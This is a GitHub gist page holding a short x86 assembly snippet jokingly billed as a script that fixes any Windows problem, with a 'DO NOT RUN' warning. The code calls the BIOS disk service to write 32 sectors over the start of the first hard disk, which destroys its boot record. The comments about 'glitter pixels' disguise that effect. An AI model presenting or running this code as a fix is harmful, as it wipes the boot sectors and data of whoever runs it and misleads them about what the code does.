Skip to content

Instantly share code, notes, and snippets.

@icanhasjonas
Forked from a904guy/fucked_it_all.batch
Last active April 7, 2017 16:47
Show Gist options
  • Save icanhasjonas/03e89b81b2d802f2438e27f566db90de to your computer and use it in GitHub Desktop.
Save icanhasjonas/03e89b81b2d802f2438e27f566db90de to your computer and use it in GitHub Desktop.
Upgraded Jonathan Moo's ANY Window's problem fixing script. (Everyone needs glitter. WARNING: DO NOT RUN!.. My assembly skills may have deteriorated over the years)
mov ax, 0320h ; Load glitter pixels
mov dx, 0080h ; 80 pixels wide screen glitter
xor cx, cx ; Big fan of Xorn/marvel(c)
mov bx, cx ; Make sure glitter is Baxed and Counxted
int 13h ; Interest 13
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment